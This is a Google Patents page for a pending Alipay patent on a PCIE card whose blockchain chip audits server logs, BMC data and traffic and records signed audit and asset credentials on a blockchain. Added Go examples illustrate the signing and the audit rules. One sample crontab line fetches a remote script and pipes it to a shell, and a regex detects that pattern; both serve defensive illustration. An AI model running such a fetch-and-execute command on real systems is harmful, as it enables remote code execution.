
CN114780327A - Server monitoring method, asset management method and PCIE card - Google Patents


Info

Publication number
CN114780327A
Authority
CN
China
Prior art keywords
server
information
chip
pcie
network
Prior art date
Legal status (as listed by Google Patents; not a legal conclusion)
Pending
Application number
CN202111479501.9A
Other languages
Chinese (zh)
Inventor
孔金灿
Current Assignee (as listed by Google Patents)
Alipay Hangzhou Information Technology Co Ltd
Original Assignee
Alipay Hangzhou Information Technology Co Ltd
Priority date (as listed by Google Patents)
Filing date
Publication date
Application filed by Alipay Hangzhou Information Technology Co Ltd
Priority to CN202111479501.9A
Publication of CN114780327A
Legal status: Pending

Classifications

    • G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F11/00 Error detection; Error correction; Monitoring > G06F11/30 Monitoring > G06F11/3055 Monitoring arrangements for monitoring the status of the computing system or of the computing system component, e.g. monitoring if the computing system is on, off, available, not available
    • G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F11/00 Error detection; Error correction; Monitoring > G06F11/30 Monitoring > G06F11/3003 Monitoring arrangements specially adapted to the computing system or computing system component being monitored > G06F11/3031 Monitoring arrangements specially adapted to the computing system or computing system component being monitored where the computing system component is a motherboard or an expansion card
    • G PHYSICS > G06 COMPUTING; CALCULATING OR COUNTING > G06F ELECTRIC DIGITAL DATA PROCESSING > G06F11/00 Error detection; Error correction; Monitoring > G06F11/30 Monitoring > G06F11/3065 Monitoring arrangements determined by the means or processing involved in reporting the monitored data
    • H ELECTRICITY > H04 ELECTRIC COMMUNICATION TECHNIQUE > H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION > H04L67/00 Network arrangements or protocols for supporting network services or applications > H04L67/01 Protocols > H04L67/10 Protocols in which an application is distributed across nodes in the network > H04L67/1097 Protocols in which an application is distributed across nodes in the network for distributed storage of data in networks, e.g. transport arrangements for network file system [NFS], storage area networks [SAN] or network attached storage [NAS]

Landscapes

  • Engineering & Computer Science (AREA)
  • Theoretical Computer Science (AREA)
  • Physics & Mathematics (AREA)
  • Computing Systems (AREA)
  • Quality & Reliability (AREA)
  • General Engineering & Computer Science (AREA)
  • General Physics & Mathematics (AREA)
  • Computer Networks & Wireless Communication (AREA)
  • Signal Processing (AREA)
  • Mathematical Physics (AREA)
  • Storage Device Security (AREA)

Abstract

An embodiment of this specification provides a server monitoring method, an asset management method and a PCIE card. The server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip. The method includes: obtaining operating information of the server through a target interface; determining security audit information of the server according to the operating information; and saving the security audit information to a blockchain network.

Description

A server monitoring method, asset management method and PCIE card

Technical field

One or more embodiments of this specification relate to the fields of computer monitoring and computer asset management, and in particular to a server monitoring method, an asset management method and a PCIE card.

Background

The conventional approach to monitoring and asset management for servers, especially data center servers, is to collect the server's operating information through the baseboard management controller (BMC) and an agent built into the server OS, and send it to the data center's management platform for security monitoring and asset management. This approach depends on the management platform for monitoring and can leave gaps in coverage. Because of network transmission load it is usually impractical to send the full volume of operating information to the platform promptly, so monitoring data is collected on a schedule, and data collected that way may already have been tampered with by an attacker, in which case the attack on the server cannot be detected from it. In addition, the server asset information is typically usable only on a single platform and is hard to use across multiple platforms.

A new approach to server monitoring and asset management is therefore needed.

Summary of the invention

The embodiments of this specification aim to provide a new server monitoring and asset management method: a PCIE card carrying an independent third-party blockchain chip is installed in the server; the blockchain chip obtains the server's operating information, performs a security audit on it and sends the audit results to a blockchain network, improving the ability to detect security problems arising on the server; and it sends the part of the operating information that reflects the state of the server as an asset to the blockchain network, where it is used to produce credentials for the server asset, facilitating trading and transfer of server assets among multiple parties and platforms and addressing the shortcomings of the prior art.

According to a first aspect, a server monitoring method is provided. The server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip. The method includes:

obtaining operating information of the server through a target interface;

determining security audit information of the server according to the operating information;

saving the security audit information to a blockchain network.

In a possible implementation, the operating system (OS) of the server has a built-in first agent program;

obtaining the operating information of the server through the target interface includes:

obtaining in-band information of the server from the first agent program through a first interface;

determining the security audit information of the server according to the operating information includes:

determining first audit information of the in-band information according to the in-band information.

In a possible implementation, the in-band information includes one or more of: server hardware information, firmware/kernel version, server process information, port information, user account information, crontab files, and system logs;

the first audit information includes one or more of: audit information on the server configuration, port control, network firewall operations, the operating system boot process, the server's multi-OS boot manager, operating system logins, application trust measurement, hard disk data input/output, and kernel vulnerabilities.

In a possible implementation, the server is further provided with a baseboard management controller (BMC),

obtaining the operating information of the server through the target interface includes:

obtaining out-of-band information of the server from the BMC through a second interface;

determining the security audit information of the server according to the operating information includes:

determining second audit information of the out-of-band information according to the out-of-band information.

In a possible implementation, the second interface is an interface supporting the NCSI (Network Controller Sideband Interface) protocol.

In a possible implementation, the out-of-band information includes one or more of: out-of-band logs, out-of-band alarms, and out-of-band sensor information;

the second audit information includes audit information on the server's health state.

In a possible implementation, obtaining the operating information of the server through the target interface includes:

obtaining, through a third interface, intermediate information of the server after the server has been powered on but before the server OS has started; the third interface includes a serial port or serial-over-LAN (SOL) serial redirection;

determining the security audit information of the server according to the operating information includes:

determining third audit information according to the intermediate information.

In a possible implementation, obtaining the operating information of the server through the target interface includes:

obtaining network communication information of the server through a fourth interface; the fourth interface includes a standard interface of a network card installed in the server;

determining the security audit information of the server according to the operating information includes:

determining fourth audit information related to network communication according to the network communication information.

In a possible implementation, the first PCIE card is one of a PCIE network card, a PCIE GPU card, or a PCIE HBA card.

In a possible implementation, the blockchain chip stores a chip ID corresponding to the blockchain chip and a public/private key pair corresponding to that chip ID; saving the security audit information to the blockchain includes:

signing the security audit information with the private key of the key pair to obtain a chip signature;

uploading the security audit information together with the chip signature to the blockchain network.

In a possible implementation, the method further includes, before uploading the security audit information and the chip signature to the blockchain network,

registering the blockchain chip on the blockchain network using the chip ID.

In a possible implementation, the key pair corresponding to the chip ID is determined through negotiation with the blockchain network.

According to a second aspect, a server asset management method is provided. The server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip. The method includes:

obtaining operating information of the server through a target interface;

saving the operating information of the server to a blockchain network, where it is used to produce a credential for the state of the server asset.

In a possible implementation, the operating system (OS) of the server has a built-in first agent program;

obtaining the operating information of the server through the target interface includes:

obtaining in-band information of the server from the first agent program through a first interface.

In a possible implementation, the in-band information includes one or more of: server usage time, and installation and usage records of applications on the server.

In a possible implementation, the server is further provided with a baseboard management controller (BMC),

obtaining the operating information of the server through the target interface includes:

obtaining out-of-band information of the server from the BMC through a second interface.

In a possible implementation, the second interface is an interface supporting the NCSI protocol.

In a possible implementation, the out-of-band information includes one or more of: BIOS/BMC firmware version, OS version, hard disk capacity and number of disks, memory capacity and number of memory modules, motherboard serial number, manufacturer and model, and power supply model and serial number.

In a possible implementation, the first PCIE card is a PCIE network card,

obtaining the operating information of the server through the target interface includes:

obtaining the MAC address and/or serial number of the PCIE network card through the media-independent interface (MII) or the reduced gigabit media-independent interface (RGMII).

In a possible implementation, the first PCIE card is one of a PCIE network card, a PCIE GPU card, or a PCIE HBA card.

In a possible implementation, the key pair corresponding to the chip ID is determined through negotiation with the blockchain network.

In a possible implementation, the credential for the state of the server asset is used for one or more of: registration, ownership confirmation, evaluation, authentication, valuation, and custody of the server asset.
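The registration, signing and upload steps of the first aspect, and the asset-state records of the second aspect, worked through in Go as an added example. This is not code from the patent or its assignee: the patent describes no concrete chain, key negotiation or record format. The in-memory Ledger standing in for the blockchain network, the ed25519 key pair generated on the chip, the JSON record layout, the log_sha256 field and every sample value are assumptions made for the example.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"encoding/json"
	"fmt"
)

// ChipIdentity: factory chip ID plus the key pair bound to it (assumption: an ed25519 pair generated on the chip; the patent says the pair is negotiated with the network).
type ChipIdentity struct {
	ChipID string
	Pub    ed25519.PublicKey
	priv   ed25519.PrivateKey // never leaves the chip
}

func NewChipIdentity(chipID string) (*ChipIdentity, error) {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return nil, err
	}
	return &ChipIdentity{ChipID: chipID, Pub: pub, priv: priv}, nil
}

// Body is the signed part of a record; Kind is "audit" (first aspect) or "asset" (second). encoding/json sorts map keys, so json(Body) is a deterministic signing input.
type Body struct {
	ChipID  string            `json:"chip_id"`
	Kind    string            `json:"kind"`
	Payload map[string]string `json:"payload"`
}

// Record is the on-chain unit: the body plus the hex ed25519 chip signature over json(Body).
type Record struct {
	Body
	Sig string `json:"sig"`
}

func signingBytes(b Body) []byte {
	out, _ := json.Marshal(b) // string-only fields: Marshal cannot fail here
	return out
}

// Sign attaches the chip signature the claims require before upload.
func (c *ChipIdentity) Sign(kind string, payload map[string]string) Record {
	b := Body{ChipID: c.ChipID, Kind: kind, Payload: payload}
	return Record{Body: b, Sig: hex.EncodeToString(ed25519.Sign(c.priv, signingBytes(b)))}
}

// Ledger stands in for the blockchain network: a chip registry plus an append-only record list.
type Ledger struct {
	registry map[string]ed25519.PublicKey
	Records  []Record
}

func NewLedger() *Ledger { return &Ledger{registry: map[string]ed25519.PublicKey{}} }

// Register binds a chip ID to its public key; the claims require this before any upload.
func (l *Ledger) Register(chipID string, pub ed25519.PublicKey) error {
	if _, dup := l.registry[chipID]; dup {
		return fmt.Errorf("chip %q already registered", chipID)
	}
	l.registry[chipID] = pub
	return nil
}

// Append accepts a record only from a registered chip and only if the signature verifies.
func (l *Ledger) Append(r Record) error {
	pub, ok := l.registry[r.ChipID]
	if !ok {
		return fmt.Errorf("chip %q not registered", r.ChipID)
	}
	sig, err := hex.DecodeString(r.Sig)
	if err != nil || !ed25519.Verify(pub, signingBytes(r.Body), sig) {
		return fmt.Errorf("chip signature for %q did not verify", r.ChipID)
	}
	l.Records = append(l.Records, r)
	return nil
}

// LogDigest pins the raw log an audit was derived from, so a copy of the log produced
// later can be compared with the digest the chip put on chain at audit time.
func LogDigest(log []byte) string {
	sum := sha256.Sum256(log)
	return hex.EncodeToString(sum[:])
}

func main() {
	// Constructed sample data, not from the patent.
	authLog := []byte("Jan  1 03:12:01 sshd[812]: Accepted password for root from 198.51.100.7\n")
	chip, _ := NewChipIdentity("SE-00042")
	ledger := NewLedger()
	_ = ledger.Register(chip.ChipID, chip.Pub)
	audit := chip.Sign("audit", map[string]string{"check": "os_login", "log_sha256": LogDigest(authLog)})
	asset := chip.Sign("asset", map[string]string{"board_sn": "MB-7781", "dimm_count": "8"})
	fmt.Println("audit accepted:", ledger.Append(audit) == nil, "asset accepted:", ledger.Append(asset) == nil)
	// The attacker scrubs the login line afterwards: the scrubbed copy no longer matches.
	fmt.Println("scrubbed log matches on-chain digest:", audit.Payload["log_sha256"] == LogDigest([]byte("")))
}
```

Two properties of this arrangement are worth keeping in mind. The network refuses records from a chip ID it has not registered and records whose signature does not verify, so code running on the compromised host cannot forge the chip's records. The signature only proves that a record came from the chip, however; it says nothing about the truthfulness of what the OS agent or the BMC handed to the chip, so the in-band and out-of-band collection paths stay inside the trust boundary. Pinning the digest of the raw log in the audit record is what lets a copy of the log produced later be checked against what the chip saw at audit time.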

According to a third aspect, a PCIE card is provided, including a blockchain chip. The blockchain chip includes a storage module, an information acquisition module and an on-chain module, where:

the storage module is used to store an identity identifier of the blockchain chip;

the information acquisition module is used to obtain operating information of the server through a target interface when the PCIE card is installed in a server;

the on-chain module is used to save server information to a blockchain network based on the identity identifier stored in the storage module, the server information being derived from the operating information.

In a possible implementation, the PCIE card further includes an audit module used to determine security audit information of the server according to the operating information, the security audit information serving as the server information.

In a possible implementation, the identity identifier is a chip ID set in the blockchain chip at the factory, and the storage module further stores the public/private key pair that corresponds to the chip ID for the blockchain network.

In a possible implementation, the operating system (OS) of the server has a built-in first agent program, and the information acquisition module is further used to:

obtain, over the PCIE bus, in-band information of the server sent by the first agent program.

In a possible implementation, the PCIE card is a PCIE network card that further includes a main control chip, and the main control chip is connected to the blockchain chip through a switch chip.

In a possible implementation, the server is further provided with a baseboard management controller (BMC), the PCIE network card is provided with a dedicated network port supporting the NCSI protocol, and the information acquisition module is further used to:

obtain, through the dedicated network port, out-of-band information of the server sent by the BMC.

In a possible implementation, the information acquisition module is further used to:

obtain, through serial-over-LAN (SOL) serial redirection, intermediate information of the server after power-on but before the server OS has started.

In a possible implementation, the information acquisition module is further used to:

obtain network communication information of the server through the standard network port on the PCIE network card.

Using one or more of the methods and PCIE cards of the above aspects can effectively improve the ability to monitor security problems on a server, and strengthen the ability to trade and transfer server assets among multiple parties and platforms.

Description of drawings

To explain the technical solutions of the embodiments of the present invention more clearly, the drawings used in describing the embodiments are briefly introduced below. Obviously, the drawings described below are only some embodiments of the present invention; those of ordinary skill in the art can derive other drawings from them without creative effort.

FIG. 1 is a schematic diagram of a server monitoring and asset management method, and of the PCIE card it uses, according to an embodiment of this specification;

FIG. 2 is a flowchart of a server monitoring method according to an embodiment of this specification;

FIG. 3 is a schematic diagram of obtaining intermediate operating information through the regular network port of a PCIE network card, according to an embodiment of this specification;

FIG. 4 is a schematic diagram of obtaining network communication information through the regular network port of a PCIE network card, according to an embodiment of this specification;

FIG. 5 is a schematic diagram of obtaining network communication information through network ports on other network cards in the server, according to an embodiment of this specification;

FIG. 6 is a schematic diagram of sending on-chain data through the regular network port of a PCIE network card, according to an embodiment of this specification;

FIG. 7 is a schematic diagram of sending on-chain data through network ports on other network cards in the server, according to an embodiment of this specification;

FIG. 8 is a flowchart of a server asset management method according to an embodiment of this specification;

FIG. 9 is a structural diagram of a PCIE card according to an embodiment of this specification.

Detailed description

The solution provided in this specification is described below with reference to the drawings.

As noted above, the conventional method of data center server monitoring and asset management collects server operating information through the BMC and an agent built into the OS, and manages the server through the data center's management platform. This conventional method has the following problems. 1) While the server runs, monitoring depends on the data center's management platform; there is no independent, effective third party local to the server (that is, independent of the server's processor) auditing its software and hardware operations. Monitoring the server this way leaves a security gap. For example, after a malicious login to the server, the attacker will typically delete the corresponding entries from the operation log to erase the traces of the malicious activity. Because there are many kinds of server operating information and the data volume is large, it is hard to send all of it to the management platform in real time; typically it is sent on a schedule. The operation log that reaches the management platform may therefore already have been altered by the attacker, so the platform cannot detect the malicious login on the server. 2) The server asset state information within the operating information collected by the data center is, on the one hand, usually kept only on a single data center platform and, on the other hand, collected through a process that lacks the endorsement of an independent third party. It therefore cannot be shared conveniently and credibly among external parties and platforms, and so cannot be used for trading or transferring server assets among multiple parties and platforms.

To solve the above technical problems, the embodiments of this specification provide a server monitoring method, an asset management method and a corresponding PCIE card. The core idea is to install in the server a PCIE card carrying a blockchain processing chip. The blockchain processing chip on the card can obtain the server's in-band and out-of-band operating information through the agent program running on the server OS and through the BMC, perform a security audit on that information, and save the resulting audit information to the blockchain network. At the same time, the part of the server's operating information that relates to the state of the server as an asset can also be sent to the blockchain network to produce credentials for the server asset, which can be used for registration, ownership confirmation, evaluation and so on of the server asset. Specifically, the blockchain processing chip may be a secure element (SE) chip. An SE chip is itself like an independent third-party microcomputer, with its own chip operating system (COS) and data storage area, and can perform secure data storage, encryption and decryption operations, and business computation. The processor on the server cannot freely access the data in the blockchain processing chip, nor learn anything about its computation. Therefore, on the one hand, with the PCIE card carrying the blockchain processing chip installed in the server, the chip can promptly obtain a large volume of the local server's operating information (without transmitting it over the network to a remote data center) and perform, for example, real-time or near-real-time security audits on it, so that security problems on the server can be discovered promptly. For example, if the server's operation log is obtained while the attacker's malicious login is still in progress, the malicious login can be discovered from that log. Moreover, the blockchain processing chip is itself secure: an attacker on the server normally cannot access the chip's computation or stored data, and so cannot influence its processing or tamper with its audit results. In this way the method improves the ability to monitor security problems on the server. On the other hand, the blockchain processing chip is independent of the server's processor, and it sends the server asset state information it obtains to the blockchain network, for example after signing it. The blockchain network is itself distributed and may, for example, include nodes belonging to multiple participants. The server asset state information sent by the chip can therefore be used to generate, in the blockchain network, a credential for the state of the server asset, which can be used for registration, ownership confirmation, authentication, valuation and so on of the server asset. This facilitates, for example, trading and transfer of server assets among the participants of the blockchain, or further, trading and transfer of server assets across different blockchain networks.

FIG. 1 is a schematic diagram of a server monitoring method, an asset management method and a PCIE card according to an embodiment of this specification. The main idea of the method is explained below with reference to FIG. 1. In the embodiment shown in FIG. 1, the PCIE card is specifically a PCIE network card on which a blockchain chip is mounted. A PCIE network card is normally installed in the target server by inserting it into a PCIE slot. Once the card is installed, the blockchain chip can receive, over the PCIE bus, the server operating information sent by the agent program running on the server OS. Generally, in server management, the operating information that can be obtained falls into two levels, in-band and out-of-band. In-band information is mainly the server operating information obtained through the server OS after the server has booted. Out-of-band information is the server operating information obtained through the BMC, whether or not the server has booted. The blockchain chip can be connected to the main control chip (MAC chip) of the PCIE network card through a switch chip. Because the network card in a server usually carries business traffic, such as connections to the internal or external network, that traffic occupies the server's regular network interfaces. The PCIE network card is therefore provided, in addition to its regular network interface, with a dedicated network interface connected to the switch chip, through which the BMC can send out-of-band information to the blockchain chip using the NCSI protocol.

After obtaining the server operating information, including in-band and out-of-band information, the blockchain chip can audit the server's security on the basis of that information. Specifically, it can perform different kinds of security audit according to the different kinds of operating information. For example, if the obtained operating information includes the server's login records, it can be determined from those records whether a malicious login is currently taking place on the server. In one embodiment, the blockchain chip can also obtain, through serial-over-LAN (SOL) serial redirection over the regular network port of the PCIE network card, the intermediate information of the server after power-on but before the server OS has started, and use that intermediate information to audit the intermediate stage between power-on and OS start, for example for virus detection. In yet another embodiment, the blockchain chip can use the regular network port of the PCIE network card to obtain the server's network communication information and perform a traffic security audit on it.
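The audit step described above, in which the chip turns collected operating information into security audit information, worked through in Go as an added example (not code from the patent or its assignee). The patent names audit categories such as port control, server configuration, OS logins and server health but does not specify the rules behind them, so the rules here (an allowlist of listening ports, crontab entries that pipe a download into a shell, root logins from outside the administrative networks, and an inlet-temperature ceiling applied to BMC sensor data) and the sample snapshot are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"net"
	"regexp"
	"strings"
)

// Snapshot is one pull of operating information: the in-band fields come from the OS
// agent over the first interface, the sensor map from the BMC over the second (out-of-band).
type Snapshot struct {
	ListeningPorts []int
	Crontab        []string
	AuthLog        []string
	Sensors        map[string]float64
}

// Finding is one line of "security audit information".
type Finding struct {
	Check    string // port_control, server_config, os_login, server_health
	Severity string
	Detail   string
}

// Policy holds the baselines the rules compare against. The rules and values are
// assumptions for this example; the patent names the audit categories only.
type Policy struct {
	allowedPorts  map[int]bool
	adminNetworks []*net.IPNet
	maxInletTempC float64
}

func NewPolicy(allowedPorts []int, adminCIDRs []string, maxInletTempC float64) (Policy, error) {
	p := Policy{allowedPorts: map[int]bool{}, maxInletTempC: maxInletTempC}
	for _, port := range allowedPorts {
		p.allowedPorts[port] = true
	}
	for _, c := range adminCIDRs {
		_, n, err := net.ParseCIDR(c)
		if err != nil {
			return Policy{}, err
		}
		p.adminNetworks = append(p.adminNetworks, n)
	}
	return p, nil
}

func (p Policy) fromAdminNetwork(addr string) bool {
	ip := net.ParseIP(addr)
	for _, n := range p.adminNetworks {
		if ip != nil && n.Contains(ip) {
			return true
		}
	}
	return false
}

var (
	acceptedLogin  = regexp.MustCompile(`Accepted \w+ for (\S+) from (\S+)`)
	fetchPipeShell = regexp.MustCompile(`\b(curl|wget)\b.*\|\s*(ba)?sh\b`)
)

// Audit derives audit information from a snapshot: one Finding per violated rule.
func Audit(s Snapshot, p Policy) []Finding {
	var out []Finding
	for _, port := range s.ListeningPorts { // port control audit
		if !p.allowedPorts[port] {
			out = append(out, Finding{"port_control", "medium", fmt.Sprintf("unexpected listener on tcp/%d", port)})
		}
	}
	for _, line := range s.Crontab { // server configuration audit
		if !strings.HasPrefix(strings.TrimSpace(line), "#") && fetchPipeShell.MatchString(line) {
			out = append(out, Finding{"server_config", "high", "crontab fetches and executes remote content: " + line})
		}
	}
	for _, line := range s.AuthLog { // OS login audit
		if m := acceptedLogin.FindStringSubmatch(line); m != nil && m[1] == "root" && !p.fromAdminNetwork(m[2]) {
			out = append(out, Finding{"os_login", "high", "root login from non-admin source " + m[2]})
		}
	}
	if t, ok := s.Sensors["inlet_temp_c"]; ok && t > p.maxInletTempC { // server health audit (out-of-band)
		out = append(out, Finding{"server_health", "medium", fmt.Sprintf("inlet temperature %.1f C exceeds %.1f C", t, p.maxInletTempC)})
	}
	return out
}

func main() {
	// Constructed sample snapshot, not data from the patent.
	policy, _ := NewPolicy([]int{22, 443}, []string{"10.0.0.0/8"}, 35)
	snap := Snapshot{
		ListeningPorts: []int{22, 443, 4444},
		Crontab:        []string{"# m h dom mon dow", "*/5 * * * * curl -s http://198.51.100.9/x | sh", "0 3 * * * /usr/sbin/logrotate"},
		AuthLog:        []string{"sshd[812]: Accepted password for root from 198.51.100.7 port 5123", "sshd[813]: Accepted publickey for root from 10.1.2.3 port 5124"},
		Sensors:        map[string]float64{"inlet_temp_c": 41.5},
	}
	for _, f := range Audit(snap, policy) {
		fmt.Printf("[%s] %s: %s\n", f.Severity, f.Check, f.Detail)
	}
}
```

Each Finding is a candidate for the audit information the chip signs and uploads; what makes the audit meaningful in the patent's design is that the snapshot is taken and evaluated on the card as it is collected, rather than after a scheduled upload during which the host could have altered the log.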

After the various types of security audit, the blockchain chip can send the audit results to the blockchain network through the PCIE network card. To retain the original information for later verification, in one embodiment the part of the operation information that directly corresponds to the audit result can also be sent to the blockchain network. As mentioned above, independent auditing by a blockchain chip located in the server itself both ensures that the security audit is timely and improves the security of the audit process, raising the security monitoring capability of the server as a whole. In addition, once the audit information has been sent to the blockchain network, the mechanism of the blockchain makes the audit information stored there difficult to tamper with after the fact, which strengthens the credibility of the audit information, for example during a post-event inspection.

The operation information of the server can include information usable for determining the asset status of the server, for example the CPU model, memory model, hard disk model, and hard disk read/write counts, which can be used to prove whether each hardware component of the server is a newer model, or what the usage state of those components is. Therefore, this part of the server operation information can also be sent to the blockchain network and used to generate a certificate of the server asset status; the certificate can be used for registration, confirmation of ownership, evaluation, and so on of the server asset, facilitating its trading and circulation.

FIG. 2 is a flowchart of a server monitoring method according to an embodiment of this specification. The server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip. As shown in FIG. 2, the method includes:

Step 21: obtaining the operation information of the server through a target interface;

Step 22: determining the security audit information of the server according to the operation information;

Step 23: saving the security audit information to a blockchain network.

First, in step 21, the operation information of the server is obtained through a target interface.

In this step, the blockchain chip can obtain different types of operation information through different types of target interface.

As described above, the obtained operation information may include in-band information. In-band information can be obtained through an agent program built into the OS. "Built into the OS" here does not mean that the agent program must be a component of the OS itself; it means an agent program that runs within the OS and depends on the OS to run. Therefore, in one embodiment, the operating system (OS) of the server has a built-in first agent program, and the in-band information of the server can be obtained from the first agent program through a first interface. A PCIE card is usually installed in the target server by inserting it into a PCIE slot of the server; PCIE (PCI-Express, Peripheral Component Interconnect Express) is a high-speed serial computer expansion bus standard. Therefore, in one example, the first interface is a PCIE interface. In different embodiments, the first PCIE card can be a different type of PCIE card; in one embodiment, the first PCIE card can be one of a PCIE network card, a PCIE GPU card, or a PCIE HBA card.

In different embodiments, in-band information of different specific types may be obtained, which this specification does not limit. In one embodiment, the in-band information may include one or more of: hardware information of the server, firmware/kernel version, server process information, port information, operating system boot information, user account information, crontab files (which schedule periodically executed commands), network firewall logs, and system logs. In subsequent steps, different categories of security audit can be performed according to the different types of in-band information.

As described above, the operation information may also include out-of-band information, which can usually be obtained through the BMC. The BMC (Baseboard Management Controller) is a server management system that works independently of the server's processor, BIOS, and operating system. What the BMC monitors and operates on is the server hardware. In different examples, the BMC can monitor the server's voltages, fans, power supplies, and so on, and make corresponding adjustments based on that information: for example, adjusting the fan speed in real time to keep the server in a healthy state, or resetting the server and restarting the system. In one example, it can also record hardware information and generate a hardware information log. Because the BMC does not depend on the server's processor, BIOS, or operating system, it can monitor the server independently whether or not the server has booted. Therefore, in one embodiment, the server is further provided with a baseboard management controller (BMC), and the out-of-band information of the server can be obtained from the BMC through a second interface. Because the BMC can usually transmit information through the NCSI (Network Controller Sideband Interface) protocol, in one embodiment the second interface is an interface supporting the NCSI protocol, for example a network port supporting NCSI.

In different embodiments, out-of-band information of different specific types may be obtained, which this specification also does not limit. In one embodiment, the out-of-band information may include one or more of: out-of-band logs, out-of-band alarms, and out-of-band sensor information (for example, temperature and humidity sensors).

In actual production scenarios, some computer viruses exploit the period after the server has started (powered on) but before the server OS has started, for example to introduce virus code. To detect such virus operations, the operation information of the server from that period is needed. Therefore, in one embodiment, the intermediate information of the server after startup but before the server OS starts can also be obtained through a third interface. In one embodiment, the third interface may include a serial port or serial-over-LAN (SOL) redirection. In general, the intermediate information can be obtained through the serial port of the server, and SOL in essence makes the serial communication available through a network port of the server. Therefore, in a specific embodiment, if the PCIE card carrying the blockchain chip is a PCIE network card, the serial port can be redirected to a conventional network port on that PCIE network card and the intermediate information obtained through that conventional network port, as shown in FIG. 3.

The obtained operation information may also include the network communication information of the server. Therefore, in one embodiment, the network communication information of the server can be obtained through a fourth interface. In one embodiment, the fourth interface includes a standard interface (also called a conventional interface or conventional network port) of a network card provided on the server. In one example, if the PCIE card carrying the blockchain chip is a PCIE network card, the network communication information can be obtained through the conventional network port on that PCIE network card, as shown in FIG. 4. In another example, if the PCIE card carrying the blockchain chip is not a PCIE network card, the network communication information can be obtained through the network ports of other network cards on the server. In essence, the server CPU obtains the network communication information from the other network cards and forwards it to the blockchain chip over the PCIE bus; in other words, the agent program built into the server OS can obtain the network communication information from the other network cards and forward it to the blockchain chip over the PCIE bus, as shown in FIG. 5.

Then, in step 22, the security audit information of the server is determined according to the operation information.

In this step, according to the different types of operation information obtained in step 21, different types of security audit can be performed to obtain the corresponding security audit information.

In the above embodiment in which in-band information is obtained through the agent program in the OS, first audit information for the in-band information can be determined according to the in-band information. In different embodiments, different types of security audit information can be determined according to the different specific types of in-band information obtained; this specification does not limit the specific types of security audit. In one example, the version information of a system or application on the server can be used to determine whether the system or application is the correct version, and thus whether the server is exposed to a security risk, for example the risk of an attacker attacking that system or application. In another example, the obtained server operation information includes information on the system patches installed on the server; it can then be determined whether the server is missing a necessary patch that should have been installed, and thus whether the server has the system vulnerability that the necessary patch corresponds to. In one embodiment, the first audit information may include one or more of: audit information on the server configuration, on port control, on network firewall operations, on the operating system boot process, on the server's multi-operating-system boot manager (for example, GRUB, the GRand Unified Bootloader), on operating system logins, on application trusted measurement, on hard disk data input/output, and on kernel vulnerabilities.

In the above embodiment in which out-of-band information is obtained through the BMC, second audit information can be determined according to the out-of-band information. In one embodiment, the second audit information may include audit information on the health state of the server; for example, the obtained voltage, fan, and power supply information of the server is used to determine whether the server is in a healthy running state.

In the above embodiment in which intermediate information is obtained, third audit information can be determined according to the intermediate information. In a specific embodiment, the third audit information may be, for example, virus audit information.

In the above embodiment in which network communication information is obtained, fourth audit information related to network communication can be determined according to the network communication information. In a specific embodiment, the fourth audit information is, for example, audit information on abnormal network traffic. In different examples, the fourth audit information may also be audit information for further refined types of abnormal traffic, which this specification does not limit.

In addition, the security audit information obtained from a given type of security audit may, in one embodiment, include the audit result of that type of audit. For example, for the security audit of server user logins described above, the corresponding security audit information may include the audit result that a malicious login did or did not occur on the target server within a specific time period. In another embodiment, the security audit information may further include the operation information directly associated with the audit result. For example, if the determined audit result is that a malicious login occurred on the target server within a specific time period, the security audit information may also include the original malicious login records, so that they can be compared against the audit result for verification afterwards.

Finally, in step 23, the security audit information is saved to the blockchain network.

In this step, saving the audit information to the blockchain network makes use of the blockchain mechanism so that the saved audit information is difficult to tamper with after the fact, strengthening the security of audit information storage. Different specific types of blockchain may be used in different implementations, which this specification does not limit. In one embodiment, the blockchain chip stores a chip ID corresponding to the blockchain chip and a public-private key pair corresponding to that chip ID. The security audit information can be signed with the private key of the pair to obtain a chip signature, and the security audit information and the chip signature are uploaded together to the blockchain network. In one example, the chip ID is a unique ID of the chip set before the chip leaves the factory.

Usually, before saving information to a blockchain network, the blockchain chip registers on that blockchain network. Therefore, in one embodiment, before the security audit information is uploaded to the blockchain network, the chip ID can be used to register the blockchain chip on the blockchain network.

The key that the blockchain chip uses for a specific blockchain network, that is, the key used to save security audit information to that blockchain network, can be determined through negotiation with the blockchain network. Therefore, in one embodiment, the public-private key pair corresponding to the chip ID can be determined through negotiation with the blockchain network.

Specifically, in one embodiment, if the PCIE card carrying the blockchain chip is a PCIE network card, the security audit information can be sent to the blockchain network through the conventional network port on that PCIE network card, as shown in FIG. 6. In another embodiment, if the PCIE card carrying the blockchain chip is not a PCIE network card, the security audit information can be sent to the blockchain network through the network ports of other network cards on the server. In essence, the information to be put on the chain is sent over the PCIE bus to the server CPU, which uploads it through the other network cards; in other words, the on-chain information can be sent to the agent program built into the server OS, and the agent program sends it to the blockchain network through the other network cards, as shown in FIG. 7.

FIG. 8 is a flowchart of a server asset management method according to an embodiment of this specification. The server is provided with a first PCIE card, the first PCIE card is provided with a blockchain chip, and the method is executed by the blockchain chip. As shown in FIG. 8, the method includes:

Step 81: obtaining the operation information of the server through a target interface;

Step 82: saving the operation information of the server to a blockchain network, where it is used to generate a certificate of the server asset status.

First, in step 81, the operation information of the server is obtained through a target interface.

In this step, the blockchain chip can obtain different types of operation information through different types of target interface. The operation information can be operation information corresponding to the asset status of the server, for example configuration and status information of the server's software and hardware components, such as memory model, processor model, hard disk read/write time, and system version. In one example, this information can be used to determine, for example, how new the model or version of each software and hardware component is and how good its condition is, and thus to determine the status of the server asset within a specific time period.

The obtained operation information may include in-band information. The process and manner of obtaining in-band information are similar to those in step 21; see the description of step 21, which is not repeated here. In different embodiments, in-band information of different specific types may be obtained. In one embodiment, the in-band information may include one or more of: the server usage time, and the installation records and usage records of applications on the server.

